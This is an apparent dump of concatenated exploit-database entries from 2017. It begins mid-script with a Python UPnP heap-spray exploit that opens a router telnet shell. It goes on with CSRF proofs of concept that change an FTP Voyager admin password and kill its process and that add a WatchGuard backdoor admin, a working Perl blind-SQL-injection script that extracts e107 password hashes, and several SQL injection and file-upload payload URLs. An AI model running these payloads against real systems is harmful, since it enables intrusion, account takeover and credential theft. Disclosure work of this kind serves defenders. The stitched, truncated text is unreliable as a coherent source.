s = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', 1900))
group_bin = socket.inet_pton(addrinfo[0], addrinfo[4][0])
mreq = group_bin + struct.pack('=I', socket.INADDR_ANY)
s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
mac()
state = 'clean'
while True:
data, sender = s.recvfrom(1500)
if sender[0] == ROUTER_IP and sender[1] == 1008:
print("[-] received SSP discovery")
data = {}
data['clean'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + b'CCCC'*11 + b'\xfc\x8c\x40/' +b'\r\n\r\n'
data['pwn'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + b"AAAA"*11 + b'\x04\xd5\x41/' +b'\r\n\r\n'
data['heap'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + IP.encode()+ b':1337/A\r\n\r\n'
data['heap2']= data['heap']
sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
sock.sendto(data[state], sender)
if state == 'pwn':
print("[-] starting payload")
while True:
try:
print("[-] try to connect to shell")
telnet = telnetlib.Telnet()
telnet.open('192.168.1.1', 0x1337, timeout=1)
print('[+] connected')
telnet.write(b'uname -a; echo [+] pwned\n')
telnet.interact()
except:
pass
time.sleep(2.0)
if state == 'heap2':
print("[-] spraying heap 2/2")
mac()
state = 'pwn'
if state == 'heap':
print("[-] spraying heap 1/2")
mac()
state = 'heap2'
if state == 'clean':
print('[-] clearing database and crashing')
mac()
state = 'heap'
---EOF---
<!--
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/FTP-VOYAGER-SCHEDULER-CSRF-REMOTE-CMD-EXECUTION.txt
[+] ISR: ApparitionSec
Vendor:
==============
solarwinds.com
www.serv-u.com
Product:
====================
FTP Voyager Scheduler
v16.2.0
Vulnerability Type:
=============================
CSRF Remote Command Execution
CVE Reference:
==============
N/A
Security Issue:
================
Multiple cross site request forgeries exist in the Web Interface side of FTP Voyager Scheduler running on port 52986.
Allowing remote attackers to make HTTP requests on behalf of an authenticated user if that user visits a malicious
webpage or clicks an attacker supplied link.
FTP Voyager has a scheduler feature that lets users create tasks/commands to execute on some type of other action like
when Directorys are created, files uploaded/downloader, Scheduler starts or stops and so forth. Remote attackers who
successfully pull off CSRF exploitation can do things like change the Admin password or cause a persistent Denial of Service
by setting the task to terminate "FTP Voyager Scheduler" itself upon startup among other nefarious things.
Exploit/POC:
=============
Default login no password, then set a password in FTP Voyager Scheduler Web interface.
Upon CSRF the user will get a HTTP Response will be like below, we can prevent user from seeing this message
targeting hidden iframe in webpage.
<response><result>0</result><ResultText>Operation was successful.</ResultText><ObjectID>141175</ObjectID></response>
1) Change Admin passwd
-->
<iframe name="hideme" style="display:none" ></iframe>
<form target="hideme" action="http://localhost:52986/Admin/XML/Result.xml?Command=UpdateObject&Object=CScheduler.0.Scheduler.0&StaticOnly=1&Sync=666" method="post">
<input type="hidden" name="AdminPassword" value="PWN123">
<input type="hidden" name="ConfirmAdminPassword" value="PWN123">
<input type="hidden" name="RemoteAdmin" value="1">
<input type="hidden" name="RemoteAdminPort" value="52986">
<input type="hidden" name="RemoteAdminSSL" value="0">
<script>document.forms[0].submit()</script>
</form>
2) Persistent Denial Of Service uses call to WMIC
<form action="http://localhost:52986/Admin/XML/Result.xml?Command=AddObject&Object=CEventAttrs.0.FVSEvent&Sync=666" method="post">
<input type="hidden" name="EventName" value="PWN">
<input type="hidden" name="Description" value="Run Command!">
<input type="hidden" name="Enabled" value="1">
<input type="hidden" name="EventID" value="1"> <!-- Run on Scheduler Start event -->
<input type="hidden" name="Action" value="2">
<input type="hidden" name="multiselect_Action" value="2">
<input type="hidden" name="EmailToAddress" value="evil@gods.abyss">
<input type="hidden" name="EmailToAddressBCC" value="">
<input type="hidden" name="ExeFilePath" value="C:\Windows\System32\wbem\WMIC.exe">
<input type="hidden" name="ExecWaitSecs" value="5">
<input type="hidden" name="Data1" value="process where name='FTP Voyager Scheduler.exe' call terminate">
<input type="hidden" name="Data2" value="&">
<script>document.forms[0].submit()</script>
</form>
<!--
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=======================================
Vendor Notification: November 30, 2016
Result: No Reply
Second Notification Attempt: March 5, 2017
Result:
March 9, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c)
hyp3rlinx
-->
##################################################################
# Exploit Title: Kinsey Infor / Lawson (ESBUS) - Multiple SQL Injections
##################################################################
# Date: 3/10/2017
##################################################################
# Exploit Author: Michael Benich
##################################################################
# Vendor homepage: http://www.kinsey.com/infor-lawson.html
##################################################################
# Version: ALL
##################################################################
# Tested on: Windows Server 2008 R2; MySQL ver 5.5
##################################################################
# CVE: CVE-2017-6550
##################################################################
Kinsey's Infor-Lawson application (formerly ESBUS) is vulnerable to SQL injection in at least two parameters:
1) TABLE parameter, PoC below
GET /esbus/servlet/GetSQLData?SCHEMA=ESBUS_INTERNAL&TABLE=SCHEDULEDTASKS UNION ALL SELECT <<ATTACKER INPUT>>&FIELD=LASTRUN&NOHEADER=1&SELECT=CLASS=com.esbus.appliance.SOD_PolicyCheck_SystemRun_TimerTask&OUT=XML HTTP/1.1
2) Query POST parameter
POST /KK_LS9ReportingPortal/GetData?SERVERID=%27;LSF_PROD& HTTP/1.1
<--snip--http headers-->
QUERY=1 AND SLEEP(5) AND ('foo'='foo')) &OUT=TAB
A JSP webshell can then be written to the /esbus/ directory.
##################################################################
Timeline:
12/1/2016 - Contacted generic security emails
12/1/2016 - Received response from vendor ("Thanks for the info...")
2/27/2017 - Followed up with contact and intent to disclose. No reply.
3/10/2017 - Disclosure
##################################################################
Title: Multiple vulnerabilities discovered in dnaLIMS DNA sequencing
web-application
Advisory URL: https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/
Date published: Mar 08, 2017
Vendor: dnaTools, Inc.
CVE IDs: [2017-6526, 2017-6527, 2017-6528, 2017-6529]
USCERT VU: 929263
Vulnerability Summaries
1) Improperly protected web shell [CVE-2017-6526]
dnaLIMS requires authentication to view cgi-bin/dna/sysAdmin.cgi, which is
a web shell included with the software running as the web user. However,
sending a POST request to that page bypasses authentication checks,
including the UID parameter within the POST request.
2) Unauthenticated Directory Traversal [CVE-2017-6527]
The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated
directory traversal attack. This allows an unauthenticated attacker to
retrieve files on the operating system accessible by the permissions of the
web server. This page also does not require authentication, allowing any
person on the Internet to exploit this vulnerability.
3) Insecure Password Storage [CVE-2017-6528]
An option, which is most likely the default, allows the password file
(/home/dna/spool/.pfile) to store clear text passwords. When combined with
the unauthenticated directory traversal vulnerability, it is possible to
gain the username and password for all users of the software and gain
complete control of the software.
4) Session Hijacking [CVE-2017-6529]
Each user of the dnaLIMS software is assigned a unique four-digit user
identification number(UID) upon account creation. These numbers appear to
be assigned sequentially. Multiple pages of the dnaLIMS application require
that this UID be passed as a URL parameter in order to view the content of
the page.
Consider the following example:
The URL ahttp://<SERVER NAME
REDACTED>/cgi-bin/dna/seqreq2N.cgi?username=61685578,2410a is a valid URL
to view the page for sequencing requests for the user with the UID of 2410. The
username parameter of the URL is the mechanism for authentication to the
system. The first eight-digit number of the username parameter appears to
be a session identifier as it changes every time the user logs in from the
password.cgi page, however this value is not checked by the seqreq2N.cgi
page. This allows an attacker to guess the four-digit UID of valid user
accounts that have an active session. The user with the UID of 2419
currently has an active session, so we can simply hijack this useras
session by requesting this page and specifying the UID 2419.
5) Cross-site Scripting
The seqID parameter of the viewAppletFsa.cgi page is vulnerable to a
reflected cross site scripting attack via GET request as seen in the
following URL:
http://<SERVER NAME REDACTED>/cgi-bin/dna/viewAppletFsa.cgi?seqID=7415-7<SCRIPT
Alert("XSS") </SCRIPT>
6) Cross-site Scripting
The navUserName parameter of the seqTable*.cgi page is vulnerable to a
reflected cross site scripting attack via POST request as seen in the
example below. The * reflects a short name for a client, (ie Shorebreak
Security may be seqTableSS.cgi or seqTableshorebreak.cgi) and may not be
vulnerable for all dnaLIMS installs.
7) Improperly Protected Content
Many of the pages within the admin interface are not properly protected
from viewing by authenticated users. This can give an attacker additional
system information about the system, or change system/software
configuration.
Software was conducted on a live production system, therefore the pages
themselves were tested, forms within these pages were not.
This is also not an exhaustive list of improperly protected pages:
cgi-bin/dna/configuration.cgi
cgi-bin/dna/createCoInfo.cgi
cgi-bin/dna/configSystem.cgi
cgi-bin/dna/combineAcctsN.cgi
Disclosure Timeline
Thu, Nov 10, 2016 at 4:25 PM: Reached out to vendor requesting PGP key to
securely exchange details of vulnerabilities identified
Thu, Nov 10, 2016 at 4:55 PM: Vendor requests report be physically mailed
to PO box via Postal Service
Wed, Nov 16, 2016, at 11:14 AM: Report mailed to vendor via USPS Certified
Mail
Thu, Dec 8, 2016, at 10:43 AM: Request Vendor acknowledge receipt of the
report
Thu, Dec 8, 2016, at 12:53 PM: Vendor acknowledges receiptI3/4 suggests
placing the software behind a firewall as a solution to the vulnerabilities.
Thu, Dec 8, 2016, at 1:54 PM: Reply that the offered solution mitigates
some risk, but does not address the vulnerabilitiesI3/4 inquire if there is a
plan to address the vulnerabilities
Thu, Dec 8, 2016, at 3:13 PM: Vendor replies aa|Yes, we have a plan. Please
gather a DNA sequence, PO Number, or Fund Number and go to your local
grocery store and see what it will buy you.a
Tue, Feb 28, 2017, at 1:15 PM: Vulnerabilities disclosed to US-CERT
Tue, Mar 7, 2017, at 8:19 AM: Vulnerabilities submitted to MITRE for CVE
assignment
Wed, Mar 8, 2017, at 12:00 PM: Vulnerabilities disclosed publicly
<!--
KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery
Title: WatchGuard XTMv User Management Cross-Site Request Forgery
Advisory ID: KL-001-2017-004
Publication Date: 2017.03.10
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt
1. Vulnerability Details
Affected Vendor: WatchGuard
Affected Product: XTMv
Affected Version: v11.12 Build 516911
Platform: Embedded Linux
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF)
Impact: Privileged Access
Attack vector: HTTP
2. Vulnerability Description
Lack of CSRF protection in the Add User functionality of the
XTMv management portal can be leveraged to create arbitrary
administrator-level accounts.
3. Technical Description
As observed below, no CSRF token is in use when adding a new
user to the management portal.
POST /put_data/ HTTP/1.1
Host: 1.3.3.7:8080
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 365
Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287
DNT: 1
Connection: close
{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked","domain":"Firebox-DB","role":"Device
Administrator","hash":"hacked","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}
The HTTP response indicates that the changes were successful.
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-Length: 68
Expires: Sun, 28 Jan 2007 00:00:00 GMT
Vary: Accept-Encoding
Server: CherryPy/3.6.0
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Date: Sat, 10 Dec 2016 18:08:22 GMT
Content-Type: application/json
Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly;
Path=/; secure
Connection: close
{"status": true, "message": ["The changes were saved successfully"]}
Now, the newly created backdoor account can be accessed.
POST /agent/login HTTP/1.1
Host: 1.3.3.7:8080
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Content-Length: 414
Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53
DNT: 1
Connection: close
<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>hacked</string></value></member><member><name>user</name><value><string>hacked</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall>
The response below shows the application issuing an authenticated
session cookie.
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-type: text/xml
Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly
Connection: close
Date: Sat, 10 Dec 2016 19:55:26 GMT
Server: none
Content-Length: 751
<?xml version="1.0"?>
<methodResponse>
<params>
<param>
<value>
<struct>
<member><name>sid</name><value>74B0DC5119495CFF2AE8944A625558EC00000008</value></member>
<member><name>response</name><value></value></member>
<member>
<name>readwrite</name>
<value><struct>
<member><name>privilege</name><value>2</value></member>
<member><name>peer_sid</name><value>0</value></member>
<member><name>peer_name</name><value>error</value></member>
<member><name>peer_ip</name><value>0.0.0.0</value></member>
</struct></value>
</member>
</struct>
</value>
</param>
</params>
</methodResponse>
4. Mitigation and Remediation Recommendation
The vendor has remediated this vulnerability in WatchGuard
XTMv v11.12.1. Release notes and upgrade instructions are
available at:
https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_12_1/index.html
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc. and Joshua Hardin.
6. Disclosure Timeline
2017.01.13 - KoreLogic sends vulnerability report and PoC to
WatchGuard.
2017.01.13 - WatchGuard acknowledges receipt of report.
2017.01.23 - WatchGuard informs KoreLogic that the
vulnerability will be addressed in the forthcoming
v11.12.1 firmware, scheduled for general
availability on or around 2017.02.21.
2017.02.22 - WatchGuard releases v11.12.1.
2017.03.10 - KoreLogic public disclosure.
7. Proof of Concept
-->
<html>
<body>
<form action="https://1.3.3.7:8080/put_data/" method="POST" enctype="text/plain">
<input type="hidden"
name="{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked3","domain":"Firebox-DB","role":"Device Administrator","hash":"hacked3","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}"
value="" />
<input type="submit" value="Trigger" />
</form>
</body>
</html>
<!--
The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->
#!/usr/bin/perl
#
#
# e107 <= 2.1.4 "keyword" Blind SQL Injection Exploit
#
# --------------------------------------------------------------------------
# [*] Discovered by staker - staker[at]hotmail[dot]it
# [*] Discovered on 09/03/2017
# [*] Site Vendor: http://www.e107.org
# [*] BUG: Blind SQL Injection
# --------------------------------------------------------------------------
#
#
# Description
# -------------------------------------------------------------------------
# e107 contains one flaw that allows an attacker to carry out an SQL
# injection attack. The issue is due to the "e107_plugins/pm/pm.php" script
# not properly saniting user-supplied input to the "keyword" POST variable
# This may allow an attacker to inject or manipulate sql queries in
# the backend database regardless of php.ini settings
# -------------------------------------------------------------------------
# SHORT EXPLANATION
# -----------------------------------
#
# FILE: "e107_handlers/core_functions.php"
#
# 76. function vartrue(&$val, $default='')
# 77. {
# 78. if (isset($val) && $val) { return $val; } {1} <--- variable is not sanized to be sent at the mysql database
# 79. return $default;
# 80.}
#
# ----------------------------------
#
# FILE: "e107/e107_plugins/pm/pm.php"
#
#
# 35. if(vartrue($_POST['keyword'])) {2}<--- if $_POST keyword variable is set, then e107 starts pm_user_lookup() function.
# 36. {
# 37. pm_user_lookup();
# 38.}
#
#
#
# 615. function pm_user_lookup()
# 616. {
# 617. $sql = e107::getDb();
# 618.
# 619. $query = "SELECT * FROM #user WHERE user_name REGEXP '^".$_POST['keyword']."' "; {3} <---- variable not sanized
# 620. if($sql->gen($query))
# 621. {
# 622. echo '[';
# 623 while($row = $sql->fetch())
# 624. {
# 625. $u[] = "{\"caption\":\"".$row['user_name']."\",\"value\":".$row['user_id']."}";
# 626. }
# 627.
# 628. echo implode(",",$u);
# 629. echo ']';
# -----------------------------------
#
#
# use your brain..
#
# Greetz to: Warwolfz Crew,
# meh, Dante90, SHADES MASTER and nexen
#
# -- 0gay --
#
# -----------------------------------
# YOUR MOM IS NOT SAFE ANYMORE!!
# CALL HER!!
# -----------------------------------
use strict;
use IO::Socket::INET;
use LWP::UserAgent;
my ($URL,$uid) = @ARGV;
my @chars = (8..122);
my ($i,$ord,$hash) = (1,undef,undef);
if (@ARGV != 2) { usage(); }
$URL = parse::URL($URL);
syswrite (STDOUT,"[-] Crypted Password: ");
for ($i=0;$i<=60;$i++)
{
foreach $ord (@chars)
{
if (e107::Query(sql($i,$ord),$URL) == 666 )
{
syswrite (STDOUT,chr($ord));
$hash .= chr($ord);
last;
}
if ($i == 2 and not defined $hash)
{
syswrite (STDOUT,"\n[-] Exploit Failed");
exit;
}
}
}
if (length($hash) == 60) {
die "\[-]Exploit Successfully";
}
else {
die "\n[-] Exploit Failed";
}
sub e107::Query
{
# 1st parameter, sql query
# 2nd parameter, e107 website
my ($query,$URL) = @_;
my $response = undef;
my $lwp = new LWP::UserAgent;
$lwp->default_header('User-Agent' => 'Lynx (textmode)');
$response = $lwp->post($URL."/pm/",
[
keyword => $query
]) or die $!;
if ($response->content =~ /caption/) {
return 666;
}
else {
return 0;
}
}
sub parse::URL
{
my $string = shift @_ || die($!);
if ($string !~ /^http:\/\/?/i) {
$string = 'http://'.$string;
}
return $string;
}
sub sql
{
# 1st parameter, an e107's userid
# 2nd parameter substring number
# 3rd parameter charcode number
my ($i,$j,$sql) = (shift,shift,undef);
$sql = "' AND ASCII(SUBSTRING((SELECT user_password FROM e107_user WHERE user_id=".$uid."),".$i.",1))=".$j."#";
return $sql;
}
sub e107::Cookies
{
my ($username,$password) = @_;
my ($packet,$content);
my $host = "127.0.0.1"; # Valid Host (insert it manually)
my $path = "/e107/"; # Valid e107 path (insert it manually)
my $data = "username=",$username."&userpass=".$password."&userlogin=Sign+In";
my $socket = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
) or die $!;
$packet .= "POST ".$path."/login.php HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: Lynx (textmode)\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length:".length($data)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet.= $data;
$socket->send($packet);
while (<$socket>) {
$content .= $_;
}
if ($content =~ /Set-Cookie: (.+?)/) {
return $1;
}
else {
die("[-] Login Failed..\n");
}
# This function is useful to log-in and retrieves your cookies, but you don't need it for this exploit.
# it works without log-in, but if you got some trouble, try to use this one.
# e107::Login('YOUR USERNAME','YOUR PASSWORD');
}
sub usage() {
print "[*---------------------------------------------------------*]\n".
"[* e107 <= 2.1.4 'keyword' Blind SQL Injection Exploit *]\n".
"[*---------------------------------------------------------*]\n".
"[* Usage: perl web.pl [host] [uid] *]\n".
"[* *]\n".
"[* Options: *]\n".
"[* [host] insert a valid host *]\n".
"[* [uid] insert a userid *]\n".
"[*---------------------------------------------------------*]\n";
exit;
}
# # # # #
# Exploit Title: Domain Marketplace Script - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: http://scripteen.com/
# Software: http://scripteen.com/item/scripts/scripteen-domain-marketplace-script.html
# Demo: http://dwm.domainauctionsscript.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?page=websites_for_sale&cat=[SQL]
# users :userId
# users :data
# users :payment_date
# users :expiration_date
# users :username
# users :password
# users :nume
# users :adresa
# Etc..
# # # # #
# # # # #
# Exploit Title: Global In – A LinkedIn Clone - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.techbizstudio.com/
# Software: https://www.techbizstudio.com/product/linkedin-clone/
# Demo: https://www.techbizstudio.com/demo/globalin/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/hsearch?accept=true&fnm=[SQL]&lnm=[SQL]
# http://localhost/[PATH]/search?type=company&key=[SQL] [Login as regular user]
# http://localhost/[PATH]/search?type=people&key=[SQL]&fnm=[SQL]&lnm=[SQL]&title=[SQL]&com=[SQL]&sc=[SQL]&co=[SQL]&industry=[SQL] [Login as regular user]
# tb_admin :id
# tb_admin :username
# tb_admin :email
# tb_admin :password
# tb_admin :ip_address
# tb_admin :is_active
# Etc..
# # # # #
# # # # #
# Exploit Title: Global In - Arbitrary File Upload
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.techbizstudio.com/
# Software: https://www.techbizstudio.com/product/linkedin-clone/
# Demo: https://www.techbizstudio.com/demo/globalin/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# Exploit :
# Login as regular user
# http://localhost/[PATH]/dashboard
# Upload Photo / File.php
# http://localhost/[PATH]/post-images/1113330455_File.php
# Etc..
# # # # #
# # # # #
# Exploit Title: Vanelo – Wanelo Clone - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.zoplay.com/
# Software: https://www.zoplay.com/web/trending-marketplace-website/
# Demo: http://wanelo.zoplay.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/shopby/IhsanSencan?q=[SQL]
# Duplicate entry 'waneloclone
# Etc..
# # # # #
# # # # #
# Exploit Title: Pet Listing Script v3.0 - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.phpjabbers.com/
# Software: https://www.phpjabbers.com/pet-listing-script/
# Demo: http://demo.phpjabbers.com/index.php?demo=petls&front=1&lid=1
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&listing_search=1&year_from=2017[SQL]&year_to=2017[SQL]
# Etc..
# # # # #
# # # # #
# Exploit Title: Property Listing Script v3.1 - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.phpjabbers.com/
# Software: https://www.phpjabbers.com/property-listing-script/
# Demo: http://demo.phpjabbers.com/index.php?demo=pls&front=1&lid=1
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1[SQL]&max_bedrooms=1[SQL]&min_bathrooms=1[SQL]&max_bathrooms=2[SQL]
# Etc..
# # # # #
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1006
The attached file causes a use-after-free in attaching a MovieClip and applying the init object.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41609.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1005
The attached file causes an out-of-bounds read when its metadata is parsed
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41608.zip